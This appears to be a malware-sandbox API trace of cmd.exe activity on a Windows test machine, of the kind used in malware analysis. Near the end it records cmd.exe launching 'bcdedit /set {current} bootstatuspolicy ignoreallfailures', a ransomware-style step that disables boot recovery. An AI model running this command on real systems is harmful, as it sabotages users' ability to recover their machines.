nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x4fb840 [0114.000] FindClose (in: hFindFile=0x4fb840 | out: hFindFile=0x4fb840) returned 1 [0114.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ef5c0 | out: lpFindFileData=0x2ef5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4fb840 [0114.000] FindClose (in: hFindFile=0x4fb840 | out: hFindFile=0x4fb840) returned 1 [0114.000] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0114.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ef5c0 | out: lpFindFileData=0x2ef5c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x218e9fe0, ftLastAccessTime.dwHighDateTime=0x1d5f7c9, ftLastWriteTime.dwLowDateTime=0x218e9fe0, ftLastWriteTime.dwHighDateTime=0x1d5f7c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x4fb840 [0114.000] FindClose (in: hFindFile=0x4fb840 | out: hFindFile=0x4fb840) returned 1 [0114.001] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0114.001] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0114.001] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0114.001] GetProcessHeap () returned 0x4e0000 [0114.001] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fad30 | out: hHeap=0x4e0000) returned 1 [0114.001] GetEnvironmentStringsW () returned 0x4fb840* [0114.001] GetProcessHeap () returned 0x4e0000 [0114.001] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xae8) returned 0x4fc330 [0114.002] FreeEnvironmentStringsW (penv=0x4fb840) returned 1 [0114.002] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac2c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.002] GetProcessHeap () returned 0x4e0000 [0114.002] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fb7d0 | out: hHeap=0x4e0000) returned 1 [0114.002] GetProcessHeap () returned 0x4e0000 [0114.002] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x4016) returned 0x4fce20 [0114.002] GetProcessHeap () returned 0x4e0000 [0114.003] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x88) returned 0x4f9650 [0114.003] GetProcessHeap () returned 0x4e0000 [0114.003] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fce20 | out: hHeap=0x4e0000) returned 1 [0114.003] GetConsoleOutputCP () returned 0x1b5 [0114.003] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0114.003] GetUserDefaultLCID () returned 0x409 [0114.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac27b50, cchData=8 | out: lpLCData=":") returned 2 [0114.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef9c0, cchData=128 | out: lpLCData="0") returned 2 [0114.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef9c0, cchData=128 | out: lpLCData="0") returned 2 [0114.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef9c0, cchData=128 | out: lpLCData="1") returned 2 [0114.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac3a740, cchData=8 | out: lpLCData="/") returned 2 [0114.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac3a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0114.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac3a460, cchData=32 | out: lpLCData="Tue") returned 4 [0114.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac3a420, cchData=32 | out: lpLCData="Wed") returned 4 [0114.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac3a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0114.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac3a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0114.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac3a360, cchData=32 | out: lpLCData="Sat") returned 4 [0114.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac3a700, cchData=32 | out: lpLCData="Sun") returned 4 [0114.005] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac27b40, cchData=8 | out: lpLCData=".") returned 2 [0114.005] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac3a4e0, cchData=8 | out: lpLCData=",") returned 2 [0114.006] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0114.007] GetProcessHeap () returned 0x4e0000 [0114.007] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x20c) returned 0x4f9750 [0114.007] GetConsoleTitleW (in: lpConsoleTitle=0x4f9750, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.008] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0114.008] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0114.008] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0114.008] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0114.009] GetProcessHeap () returned 0x4e0000 [0114.009] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x4012) returned 0x4fce20 [0114.009] GetProcessHeap () returned 0x4e0000 [0114.009] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fce20 | out: hHeap=0x4e0000) returned 1 [0114.011] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0114.011] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0114.011] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0114.011] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0114.011] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0114.011] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0114.011] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0114.011] GetProcessHeap () returned 0x4e0000 [0114.011] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xb0) returned 0x4f9970 [0114.012] GetProcessHeap () returned 0x4e0000 [0114.012] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x20) returned 0x4f4690 [0114.015] GetProcessHeap () returned 0x4e0000 [0114.015] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x76) returned 0x4f9a30 [0114.017] GetConsoleTitleW (in: lpConsoleTitle=0x2ef8d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.018] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0114.018] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0114.018] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0114.018] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0114.018] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0114.018] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0114.018] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0114.018] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0114.019] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0114.019] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0114.019] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0114.019] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0114.019] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0114.019] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0114.019] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0114.019] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0114.019] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0114.019] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0114.019] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0114.019] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0114.019] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0114.019] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0114.019] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0114.020] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0114.020] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0114.020] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0114.020] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0114.020] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0114.020] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0114.020] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0114.020] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0114.020] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0114.020] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0114.020] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0114.020] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0114.020] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0114.020] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0114.020] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0114.020] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0114.020] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0114.020] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0114.020] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0114.020] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0114.021] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0114.021] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0114.021] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0114.021] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0114.021] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0114.021] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0114.021] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0114.021] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0114.021] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0114.021] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0114.021] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0114.021] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0114.021] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0114.021] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0114.022] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0114.022] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0114.022] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0114.022] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0114.022] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0114.022] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0114.022] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0114.022] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0114.022] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0114.022] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0114.022] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0114.022] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0114.022] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0114.022] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0114.022] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0114.023] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0114.023] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0114.023] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0114.023] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0114.023] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0114.023] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0114.023] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0114.023] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0114.023] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0114.023] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0114.023] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0114.023] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0114.023] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0114.024] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0114.024] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0114.025] GetProcessHeap () returned 0x4e0000 [0114.025] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x218) returned 0x4f9ab0 [0114.025] GetProcessHeap () returned 0x4e0000 [0114.025] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x86) returned 0x4f9cd0 [0114.025] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0114.026] GetProcessHeap () returned 0x4e0000 [0114.026] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x420) returned 0x4e1320 [0114.026] SetErrorMode (uMode=0x0) returned 0x0 [0114.026] SetErrorMode (uMode=0x1) returned 0x0 [0114.027] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4e1330, lpFilePart=0x2ef160 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef160*="Desktop") returned 0x25 [0114.027] SetErrorMode (uMode=0x0) returned 0x1 [0114.027] GetProcessHeap () returned 0x4e0000 [0114.027] RtlReAllocateHeap (Heap=0x4e0000, Flags=0x0, Ptr=0x4e1320, Size=0x6c) returned 0x4e1320 [0114.027] GetProcessHeap () returned 0x4e0000 [0114.027] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4e1320) returned 0x6c [0114.027] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.027] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.028] GetProcessHeap () returned 0x4e0000 [0114.028] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x128) returned 0x4f9d60 [0114.028] GetProcessHeap () returned 0x4e0000 [0114.028] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x240) returned 0x4e13a0 [0114.191] GetProcessHeap () returned 0x4e0000 [0114.191] RtlReAllocateHeap (Heap=0x4e0000, Flags=0x0, Ptr=0x4e13a0, Size=0x12a) returned 0x4e13a0 [0114.192] GetProcessHeap () returned 0x4e0000 [0114.192] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4e13a0) returned 0x12a [0114.192] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.192] GetProcessHeap () returned 0x4e0000 [0114.192] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xe8) returned 0x4f9e90 [0114.192] GetProcessHeap () returned 0x4e0000 [0114.192] RtlReAllocateHeap (Heap=0x4e0000, Flags=0x0, Ptr=0x4f9e90, Size=0x7e) returned 0x4f9e90 [0114.192] GetProcessHeap () returned 0x4e0000 [0114.192] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f9e90) returned 0x7e [0114.335] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.336] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x2eeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeed0) returned 0xffffffffffffffff [0114.336] GetLastError () returned 0x2 [0114.336] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x2eeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeed0) returned 0xffffffffffffffff [0114.336] GetLastError () returned 0x2 [0114.336] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.336] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x2eeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeed0) returned 0x4f9f20 [0114.336] GetProcessHeap () returned 0x4e0000 [0114.336] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x28) returned 0x4f46c0 [0114.336] FindClose (in: hFindFile=0x4f9f20 | out: hFindFile=0x4f9f20) returned 1 [0114.336] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x2eeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeed0) returned 0xffffffffffffffff [0114.337] GetLastError () returned 0x2 [0114.337] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeed0) returned 0x4f9f20 [0114.337] GetProcessHeap () returned 0x4e0000 [0114.337] RtlReAllocateHeap (Heap=0x4e0000, Flags=0x0, Ptr=0x4f46c0, Size=0x8) returned 0x4f8a00 [0114.337] FindClose (in: hFindFile=0x4f9f20 | out: hFindFile=0x4f9f20) returned 1 [0114.337] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0114.337] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0114.337] GetConsoleTitleW (in: lpConsoleTitle=0x2ef420, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.337] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef1d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef198 | out: lpAttributeList=0x2ef1d8, lpSize=0x2ef198) returned 1 [0114.337] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef1d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef188, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef1d8, lpPreviousValue=0x0) returned 1 [0114.338] GetStartupInfoW (in: lpStartupInfo=0x2ef2f0 | out: lpStartupInfo=0x2ef2f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0114.338] GetProcessHeap () returned 0x4e0000 [0114.338] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x20) returned 0x4f46c0 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0114.339] GetProcessHeap () returned 0x4e0000 [0114.339] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f46c0 | out: hHeap=0x4e0000) returned 1 [0114.340] GetProcessHeap () returned 0x4e0000 [0114.340] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x12) returned 0x4f9f20 [0114.340] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0114.341] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {current} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2ef210*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {current} bootstatuspolicy ignoreallfailures", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef1c0 | out: lpCommandLine="bcdedit /set {current} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x2ef1c0*(hProcess=0x54, hThread=0x50, dwProcessId=0x540, dwThreadId=0x2a8)) returned 1 [0115.300] CloseHandle (hObject=0x50) returned 1 [0115.301] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0115.301] GetProcessHeap () returned 0x4e0000 [0115.301] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fc330 | out: hHeap=0x4e0000) returned 1 [0115.301] GetEnvironmentStringsW () returned 0x4fad30* [0115.301] GetProcessHeap () returned 0x4e0000 [0115.301] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xae8) returned 0x4fb820 [0115.301] FreeEnvironmentStringsW (penv=0x4fad30) returned 1 [0115.301] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0116.789] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x2ef108 | out: lpExitCode=0x2ef108*=0x0) returned 1 [0116.789] CloseHandle (hObject=0x54) returned 1 [0116.789] _vsnwprintf (in: _Buffer=0x2ef378, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef118 | out: _Buffer="00000000") returned 8 [0116.790] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0116.790] GetProcessHeap () returned 0x4e0000 [0116.790] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fb820 | out: hHeap=0x4e0000) returned 1 [0116.790] GetEnvironmentStringsW () returned 0x4fad30* [0116.790] GetProcessHeap () returned 0x4e0000 [0116.790] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xb0e) returned 0x4fce30 [0116.793] FreeEnvironmentStringsW (penv=0x4fad30) returned 1 [0116.793] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0116.793] GetProcessHeap () returned 0x4e0000 [0116.793] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fce30 | out: hHeap=0x4e0000) returned 1 [0116.793] GetEnvironmentStringsW () returned 0x4fad30* [0116.794] GetProcessHeap () returned 0x4e0000 [0116.794] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xb0e) returned 0x4fce30 [0116.794] FreeEnvironmentStringsW (penv=0x4fad30) returned 1 [0116.794] GetProcessHeap () returned 0x4e0000 [0116.794] HeapFree (in: hHeap=0x4e0000, 